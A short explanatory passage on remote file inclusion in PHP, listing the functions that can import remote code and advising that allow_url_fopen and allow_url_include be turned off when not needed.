The most common source of hostile RFI is careless PHP code. Several commands in the language can bring in code from an arbitrary link. It's treated as if it's directly present in the local PHP file, so it can do all kinds of damage. The commands which can import remote files are:
- include
- include_once
- require
- require_once
- fopen
- file_get_contents
Importing PHP code isn't the only possibility. If the application launches shell scripts, an attacker could potentially feed it a remote file that will run in the server's command line environment. It could steal information, alter files, and connect to a command-and-control server.
PHP has two settings which control whether it will accept remote URIs. They are allow_url_fopen and allow_url_include. They both have to be set to "on" to allow remote file inclusion. Turning them off when they aren't needed significantly reduces the risk.